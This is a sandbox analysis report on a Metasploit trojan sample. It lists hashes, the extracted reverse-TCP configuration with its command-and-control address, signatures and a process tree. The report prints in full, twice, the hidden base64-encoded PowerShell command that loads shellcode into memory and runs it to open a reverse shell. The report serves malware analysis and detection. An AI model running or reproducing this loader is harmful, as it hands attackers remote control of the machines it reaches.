metasploit | cfb5f740f662cd134e5a114a9f041a0c320fba850b48874ff1d2c23ca6be3fb5

General

Target

cfb5f740f662cd134e5a114a9f041a0c320fba850b48874ff1d2c23ca6be3fb5.exe
Size

17KB
MD5

b89b02e73b9191bbae636a043a1bc765
SHA1

d82d93d0d526b5dd36515c493a4c606ccaf3c787
SHA256

cfb5f740f662cd134e5a114a9f041a0c320fba850b48874ff1d2c23ca6be3fb5
SHA512

2dc14042e1533cd1f301665f8924c63df8cae5ce6b7d36afbe14ea755f913c84664a6f75b1ef82bb294f0b701e167b78cdb8129b6f3038cf5e87cb9bf44eb023
SSDEEP

384:YKwAXXwpskBwiRtj8cgYI90TumDI2cl1caXU0cYulkXwJtb9jv:BXXXKHBxRtj8c6Ccl1caXFcoXwJtb9jv

Score

10^/10

metasploit backdoor execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

192.168.12.128:5544

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

1200 powershell.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

1200 powershell.exe
1200 powershell.exe
412 powershell.exe
412 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1200 powershell.exe
Token: SeDebugPrivilege 412 powershell.exe

pid	process
1200	powershell.exe

pid	process
1200	powershell.exe
1200	powershell.exe
412	powershell.exe
412	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1200	powershell.exe
Token: SeDebugPrivilege	412	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

Processes:

cfb5f740f662cd134e5a114a9f041a0c320fba850b48874ff1d2c23ca6be3fb5.execmd.exepowershell.exepowershell.execsc.exe

description	pid	process	target process
PID 4888 wrote to memory of 1424	4888	cfb5f740f662cd134e5a114a9f041a0c320fba850b48874ff1d2c23ca6be3fb5.exe	cmd.exe
PID 4888 wrote to memory of 1424	4888	cfb5f740f662cd134e5a114a9f041a0c320fba850b48874ff1d2c23ca6be3fb5.exe	cmd.exe
PID 1424 wrote to memory of 1200	1424	cmd.exe	powershell.exe
PID 1424 wrote to memory of 1200	1424	cmd.exe	powershell.exe
PID 1200 wrote to memory of 412	1200	powershell.exe	powershell.exe
PID 1200 wrote to memory of 412	1200	powershell.exe	powershell.exe
PID 1200 wrote to memory of 412	1200	powershell.exe	powershell.exe
PID 412 wrote to memory of 3816	412	powershell.exe	csc.exe
PID 412 wrote to memory of 3816	412	powershell.exe	csc.exe
PID 412 wrote to memory of 3816	412	powershell.exe	csc.exe
PID 3816 wrote to memory of 2544	3816	csc.exe	cvtres.exe
PID 3816 wrote to memory of 2544	3816	csc.exe	cvtres.exe
PID 3816 wrote to memory of 2544	3816	csc.exe	cvtres.exe

C:\Users\Admin\AppData\Local\Temp\cfb5f740f662cd134e5a114a9f041a0c320fba850b48874ff1d2c23ca6be3fb5.exe
"C:\Users\Admin\AppData\Local\Temp\cfb5f740f662cd134e5a114a9f041a0c320fba850b48874ff1d2c23ca6be3fb5.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAA2AEUAWQAgAD0AIAAnACQAUAB5AEcAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAUAB5AEcAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABhACwAMAB4AGMANQAsADAAeABiAGEALAAwAHgANAA4ACwAMAB4AGQAMQAsADAAeABmAGYALAAwAHgAOQA2ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGUALAAwAHgAMgBiACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA1ADYALAAwAHgAMQA3ACwAMAB4ADgAMwAsADAAeABlAGUALAAwAHgAZgBjACwAMAB4ADAAMwAsADAAeAAxAGUALAAwAHgAYwAyACwAMAB4ADEAZAAsADAAeAA2ADMALAAwAHgANgAyACwAMAB4ADAAYwAsADAAeAA2AGUALAAwAHgAOABjACwAMAB4ADkAYQAsADAAeABjAGQALAAwAHgAMQAxACwAMAB4ADAANAAsADAAeAA3AGYALAAwAHgAZgBjACwAMAB4ADAAMwAsADAAeAA3ADIALAAwAHgAZgA0ACwAMAB4AGEAZAAsADAAeAA5ADMALAAwAHgAZgAwACwAMAB4ADUAOAAsADAAeAA1AGUALAAwAHgANQBmACwAMAB4ADUANAAsADAAeAA0ADgALAAwAHgAZAA1ACwAMAB4ADIAZAAsADAAeAA3ADEALAAwAHgANAAxACwAMAB4ADEANgAsADAAeABkAGUALAAwAHgAMwA2ACwAMAB4AGUAYgAsADAAeABjAGUALAAwAHgAZAAwACwAMAB4AGYAOAAsADAAeAA0ADcALAAwAHgAMwAyACwAMAB4ADcAMgAsADAAeAA4ADUALAAwAHgAOQA1ACwAMAB4ADYANwAsADAAeAA1ADQALAAwAHgAYgA0ACwAMAB4ADUANgAsADAAeAA3AGEALAAwAHgAOQA1ACwAMAB4AGYAMQAsADAAeAAyADEALAAwAHgAZgAwACwAMAB4ADcAYQAsADAAeABhAGYALAAwAHgAMwBhACwAMAB4AGEAOAAsADAAeAA5ADQALAAwAHgAMAA3ACwAMAB4AGIANwAsADAAeAAwAGYALAAwAHgAYQA5ACwAMAB4AGEANgAsADAAeAAxADcALAAwAHgAMAA0ACwAMAB4ADkAMQAsADAAeABkADAALAAwAHgAMQAyACwAMAB4AGQAYgAsADAAeAA2ADYALAAwAHgANgBkACwAMAB4ADEAZAAsADAAeAAwAGMALAAwAHgAMABkACwAMAB4ADMANQAsADAAeAAzAGQALAAwAHgAYQBkACwAMAB4AGMAMQAsADAAeAA0AGQALAAwAHgANwA1ACwAMAB4AGIANQAsADAAeABiADUALAAwAHgAZAA0ACwAMAB4ADQAYwAsADAAeABiADEALAAwAHgAMAA5ACwAMAB4ADkAZQAsADAAeAA3AGYALAAwAHgAYwA1ACwAMAB4AGYAOQAsADAAeAAxADQALAAwAHgAZgA0ACwAMAB4ADMAOAAsADAAeAAyADgALAAwAHgANgA1ACwAMAB4AGMAYQAsADAAeABmAGEALAAwAHgAMQBiACwAMAB4ADgAYgAsADAAeAA2ADYALAAwAHgAZgBkACwAMAB4ADYANAAsADAAeABhAGMALAAwAHgAOQA2ACwAMAB4ADgAYgAsADAAeAA5AGUALAAwAHgAYwBlACwAMAB4ADIAYgAsADAAeAA4AGMALAAwAHgANgA0ACwAMAB4AGEAYwAsADAAeABmADcALAAwAHgAMQA5ACwAMAB4ADcAYgAsADAAeAAxADYALAAwAHgANwBjACwAMAB4AGIAOQAsADAAeAA1AGYALAAwAHgAYQA2ACwAMAB4ADUAMQAsADAAeAA1AGMALAAwAHgAMgBiACwAMAB4AGEANAAsADAAeAAxAGUALAAwAHgAMgBhACwAMAB4ADcAMwAsADAAeABhADkALAAwAHgAYQAxACwAMAB4AGYAZgAsADAAeAAwAGYALAAwAHgAZAA1ACwAMAB4ADIAYQAsADAAeABmAGUALAAwAHgAZABmACwAMAB4ADUAZgAsADAAeAA2ADgALAAwAHgAMgA1ACwAMAB4AGMANAAsADAAeAAwADQALAAwAHgAMgBiACwAMAB4ADQANAAsADAAeAA1AGQALAAwAHgAZQAxACwAMAB4ADkAYQAsADAAeAA3ADkALAAwAHgAYgBkACwAMAB4ADQAZAAsADAAeAA0ADMALAAwAHgAZABjACwAMAB4AGIANQAsADAAeAA3AGMALAAwAHgAOQAyACwAMAB4ADYAMAAsADAAeAAzADYALAAwAHgANwBmACwAMAB4ADkAYgAsADAAeAAzAGMALAAwAHgAYQAxACwAMAB4AGIAMwAsADAAeAA1ADEALAAwAHgAYgBmACwAMAB4ADMAMQAsADAAeABkAGMALAAwAHgAZQAyACwAMAB4AGMAYwAsADAAeAAwADMALAAwAHgANAAzACwAMAB4ADUAOAAsADAAeAA1AGIALAAwAHgAMgA4ACwAMAB4ADAAYwAsADAAeAA0ADYALAAwAHgAOQBjACwAMAB4ADMAOQAsADAAeAAxAGEALAAwAHgANwA5ACwAMAB4ADcAMgAsADAAeAA4ADEALAAwAHgANABiACwAMAB4ADgANAAsADAAeAA3ADMALAAwAHgAZgAyACwAMAB4ADQAMgAsADAAeAA0ADIALAAwAHgAMgA3ACwAMAB4AGEAMgAsADAAeABmAGMALAAwAHgANgAzACwAMAB4ADQAOAAsADAAeAAyADkALAAwAHgAZgBkACwAMAB4ADgAYwAsADAAeAA5AGQALAAwAHgAYwA0ACwAMAB4AGYANwAsADAAeAAxAGEALAAwAHgAZABlACwAMAB4AGIAMQAsADAAeAAwADQALAAwAHgANQBhACwAMAB4AGIANgAsADAAeABjADMALAAwAHgAMQA0ACwAMAB4ADQAZgAsADAAeABlAGYALAAwAHgANABkACwAMAB4AGYAMgAsADAAeAAzAGYALAAwAHgAYgBmACwAMAB4ADEAZAAsADAAeABhAGIALAAwAHgAZgBmACwAMAB4ADYAZgAsADAAeABkAGUALAAwAHgAMQBiACwAMAB4ADkANwAsADAAeAA2ADUALAAwAHgAZAAxACwAMAB4ADQANAAsADAAeAA4ADcALAAwAHgAOAA1ACwAMAB4ADMAYgAsADAAeABlAGQALAAwAHgAMgBkACwAMAB4ADYAYQAsADAAeAA5ADIALAAwAHgANAA1ACwAMAB4AGQAOQAsADAAeAAxADMALAAwAHgAYgBmACwAMAB4ADEAZQAsADAAeAA3ADgALAAwAHgAZABiACwAMAB4ADEANQAsADAAeAA1AGIALAAwAHgAYgBhACwAMAB4ADUANwAsADAAeAA5AGEALAAwAHgAOQBiACwAMAB4ADcANAAsADAAeAA5ADAALAAwAHgAZAA3ACwAMAB4ADgAZgAsADAAeABlADAALAAwAHgANQAwACwAMAB4AGEAMgAsADAAeABmADIALAAwAHgAYQA2ACwAMAB4ADYAZgAsADAAeAAxADgALAAwAHgAOQA4ACwAMAB4ADQANgAsADAAeABmAGEALAAwAHgAYQA3ACwAMAB4ADAAYgAsADAAeAAxADEALAAwAHgAOQAyACwAMAB4AGEANQAsADAAeAA2AGEALAAwAHgANQA1ACwAMAB4ADMAZAAsADAAeAA1ADUALAAwAHgANQA5ACwAMAB4AGUAZQAsADAAeABmADQALAAwAHgAYwAzACwAMAB4ADIAMgAsADAAeAA5ADgALAAwAHgAZgA4ACwAMAB4ADAAMwAsADAAeABhADMALAAwAHgANQA4ACwAMAB4AGEAZgAsADAAeAA0ADkALAAwAHgAYQAzACwAMAB4ADMAMAAsADAAeAAxADcALAAwAHgAMgBhACwAMAB4AGYAMAAsADAAeAAyADUALAAwAHgANQA4ACwAMAB4AGUANwAsADAAeAA2ADQALAAwAHgAZgA2ACwAMAB4AGMAZAAsADAAeAAwADgALAAwAHgAZABkACwAMAB4AGEAYgAsADAAeAA0ADYALAAwAHgANgAxACwAMAB4AGUAMwAsADAAeAA5ADIALAAwAHgAYQAxACwAMAB4ADIAZQAsADAAeAAxAGMALAAwAHgAZgAxACwAMAB4ADMAMwAsADAAeAAxADIALAAwAHgAYwBiACwAMAB4ADMAZgAsADAAeAA0ADYALAAwAHgANwBhACwAMAB4AGMAZgA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQASABsAHAAVwA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQASABsAHAAVwAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQASABsAHAAVwAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkADYARQBZACkAKQA7ACQAUQBNAHAAVwAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAEcAMQBoAGgAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQARwAxAGgAaAAgACQAUQBNAHAAVwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABRAE0AcABXACAAJABlACIAOwB9AA==
2⤵
- Suspicious use of WriteProcessMemory
PID:1424

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -window hidden -EncodedCommand JAA2AEUAWQAgAD0AIAAnACQAUAB5AEcAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAUAB5AEcAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABhACwAMAB4AGMANQAsADAAeABiAGEALAAwAHgANAA4ACwAMAB4AGQAMQAsADAAeABmAGYALAAwAHgAOQA2ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGUALAAwAHgAMgBiACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA1ADYALAAwAHgAMQA3ACwAMAB4ADgAMwAsADAAeABlAGUALAAwAHgAZgBjACwAMAB4ADAAMwAsADAAeAAxAGUALAAwAHgAYwAyACwAMAB4ADEAZAAsADAAeAA2ADMALAAwAHgANgAyACwAMAB4ADAAYwAsADAAeAA2AGUALAAwAHgAOABjACwAMAB4ADkAYQAsADAAeABjAGQALAAwAHgAMQAxACwAMAB4ADAANAAsADAAeAA3AGYALAAwAHgAZgBjACwAMAB4ADAAMwAsADAAeAA3ADIALAAwAHgAZgA0ACwAMAB4AGEAZAAsADAAeAA5ADMALAAwAHgAZgAwACwAMAB4ADUAOAAsADAAeAA1AGUALAAwAHgANQBmACwAMAB4ADUANAAsADAAeAA0ADgALAAwAHgAZAA1ACwAMAB4ADIAZAAsADAAeAA3ADEALAAwAHgANAAxACwAMAB4ADEANgAsADAAeABkAGUALAAwAHgAMwA2ACwAMAB4AGUAYgAsADAAeABjAGUALAAwAHgAZAAwACwAMAB4AGYAOAAsADAAeAA0ADcALAAwAHgAMwAyACwAMAB4ADcAMgAsADAAeAA4ADUALAAwAHgAOQA1ACwAMAB4ADYANwAsADAAeAA1ADQALAAwAHgAYgA0ACwAMAB4ADUANgAsADAAeAA3AGEALAAwAHgAOQA1ACwAMAB4AGYAMQAsADAAeAAyADEALAAwAHgAZgAwACwAMAB4ADcAYQAsADAAeABhAGYALAAwAHgAMwBhACwAMAB4AGEAOAAsADAAeAA5ADQALAAwAHgAMAA3ACwAMAB4AGIANwAsADAAeAAwAGYALAAwAHgAYQA5ACwAMAB4AGEANgAsADAAeAAxADcALAAwAHgAMAA0ACwAMAB4ADkAMQAsADAAeABkADAALAAwAHgAMQAyACwAMAB4AGQAYgAsADAAeAA2ADYALAAwAHgANgBkACwAMAB4ADEAZAAsADAAeAAwAGMALAAwAHgAMABkACwAMAB4ADMANQAsADAAeAAzAGQALAAwAHgAYQBkACwAMAB4AGMAMQAsADAAeAA0AGQALAAwAHgANwA1ACwAMAB4AGIANQAsADAAeABiADUALAAwAHgAZAA0ACwAMAB4ADQAYwAsADAAeABiADEALAAwAHgAMAA5ACwAMAB4ADkAZQAsADAAeAA3AGYALAAwAHgAYwA1ACwAMAB4AGYAOQAsADAAeAAxADQALAAwAHgAZgA0ACwAMAB4ADMAOAAsADAAeAAyADgALAAwAHgANgA1ACwAMAB4AGMAYQAsADAAeABmAGEALAAwAHgAMQBiACwAMAB4ADgAYgAsADAAeAA2ADYALAAwAHgAZgBkACwAMAB4ADYANAAsADAAeABhAGMALAAwAHgAOQA2ACwAMAB4ADgAYgAsADAAeAA5AGUALAAwAHgAYwBlACwAMAB4ADIAYgAsADAAeAA4AGMALAAwAHgANgA0ACwAMAB4AGEAYwAsADAAeABmADcALAAwAHgAMQA5ACwAMAB4ADcAYgAsADAAeAAxADYALAAwAHgANwBjACwAMAB4AGIAOQAsADAAeAA1AGYALAAwAHgAYQA2ACwAMAB4ADUAMQAsADAAeAA1AGMALAAwAHgAMgBiACwAMAB4AGEANAAsADAAeAAxAGUALAAwAHgAMgBhACwAMAB4ADcAMwAsADAAeABhADkALAAwAHgAYQAxACwAMAB4AGYAZgAsADAAeAAwAGYALAAwAHgAZAA1ACwAMAB4ADIAYQAsADAAeABmAGUALAAwAHgAZABmACwAMAB4ADUAZgAsADAAeAA2ADgALAAwAHgAMgA1ACwAMAB4AGMANAAsADAAeAAwADQALAAwAHgAMgBiACwAMAB4ADQANAAsADAAeAA1AGQALAAwAHgAZQAxACwAMAB4ADkAYQAsADAAeAA3ADkALAAwAHgAYgBkACwAMAB4ADQAZAAsADAAeAA0ADMALAAwAHgAZABjACwAMAB4AGIANQAsADAAeAA3AGMALAAwAHgAOQAyACwAMAB4ADYAMAAsADAAeAAzADYALAAwAHgANwBmACwAMAB4ADkAYgAsADAAeAAzAGMALAAwAHgAYQAxACwAMAB4AGIAMwAsADAAeAA1ADEALAAwAHgAYgBmACwAMAB4ADMAMQAsADAAeABkAGMALAAwAHgAZQAyACwAMAB4AGMAYwAsADAAeAAwADMALAAwAHgANAAzACwAMAB4ADUAOAAsADAAeAA1AGIALAAwAHgAMgA4ACwAMAB4ADAAYwAsADAAeAA0ADYALAAwAHgAOQBjACwAMAB4ADMAOQAsADAAeAAxAGEALAAwAHgANwA5ACwAMAB4ADcAMgAsADAAeAA4ADEALAAwAHgANABiACwAMAB4ADgANAAsADAAeAA3ADMALAAwAHgAZgAyACwAMAB4ADQAMgAsADAAeAA0ADIALAAwAHgAMgA3ACwAMAB4AGEAMgAsADAAeABmAGMALAAwAHgANgAzACwAMAB4ADQAOAAsADAAeAAyADkALAAwAHgAZgBkACwAMAB4ADgAYwAsADAAeAA5AGQALAAwAHgAYwA0ACwAMAB4AGYANwAsADAAeAAxAGEALAAwAHgAZABlACwAMAB4AGIAMQAsADAAeAAwADQALAAwAHgANQBhACwAMAB4AGIANgAsADAAeABjADMALAAwAHgAMQA0ACwAMAB4ADQAZgAsADAAeABlAGYALAAwAHgANABkACwAMAB4AGYAMgAsADAAeAAzAGYALAAwAHgAYgBmACwAMAB4ADEAZAAsADAAeABhAGIALAAwAHgAZgBmACwAMAB4ADYAZgAsADAAeABkAGUALAAwAHgAMQBiACwAMAB4ADkANwAsADAAeAA2ADUALAAwAHgAZAAxACwAMAB4ADQANAAsADAAeAA4ADcALAAwAHgAOAA1ACwAMAB4ADMAYgAsADAAeABlAGQALAAwAHgAMgBkACwAMAB4ADYAYQAsADAAeAA5ADIALAAwAHgANAA1ACwAMAB4AGQAOQAsADAAeAAxADMALAAwAHgAYgBmACwAMAB4ADEAZQAsADAAeAA3ADgALAAwAHgAZABiACwAMAB4ADEANQAsADAAeAA1AGIALAAwAHgAYgBhACwAMAB4ADUANwAsADAAeAA5AGEALAAwAHgAOQBiACwAMAB4ADcANAAsADAAeAA5ADAALAAwAHgAZAA3ACwAMAB4ADgAZgAsADAAeABlADAALAAwAHgANQAwACwAMAB4AGEAMgAsADAAeABmADIALAAwAHgAYQA2ACwAMAB4ADYAZgAsADAAeAAxADgALAAwAHgAOQA4ACwAMAB4ADQANgAsADAAeABmAGEALAAwAHgAYQA3ACwAMAB4ADAAYgAsADAAeAAxADEALAAwAHgAOQAyACwAMAB4AGEANQAsADAAeAA2AGEALAAwAHgANQA1ACwAMAB4ADMAZAAsADAAeAA1ADUALAAwAHgANQA5ACwAMAB4AGUAZQAsADAAeABmADQALAAwAHgAYwAzACwAMAB4ADIAMgAsADAAeAA5ADgALAAwAHgAZgA4ACwAMAB4ADAAMwAsADAAeABhADMALAAwAHgANQA4ACwAMAB4AGEAZgAsADAAeAA0ADkALAAwAHgAYQAzACwAMAB4ADMAMAAsADAAeAAxADcALAAwAHgAMgBhACwAMAB4AGYAMAAsADAAeAAyADUALAAwAHgANQA4ACwAMAB4AGUANwAsADAAeAA2ADQALAAwAHgAZgA2ACwAMAB4AGMAZAAsADAAeAAwADgALAAwAHgAZABkACwAMAB4AGEAYgAsADAAeAA0ADYALAAwAHgANgAxACwAMAB4AGUAMwAsADAAeAA5ADIALAAwAHgAYQAxACwAMAB4ADIAZQAsADAAeAAxAGMALAAwAHgAZgAxACwAMAB4ADMAMwAsADAAeAAxADIALAAwAHgAYwBiACwAMAB4ADMAZgAsADAAeAA0ADYALAAwAHgANwBhACwAMAB4AGMAZgA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQASABsAHAAVwA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQASABsAHAAVwAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQASABsAHAAVwAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkADYARQBZACkAKQA7ACQAUQBNAHAAVwAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAEcAMQBoAGgAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQARwAxAGgAaAAgACQAUQBNAHAAVwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABRAE0AcABXACAAJABlACIAOwB9AA==
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
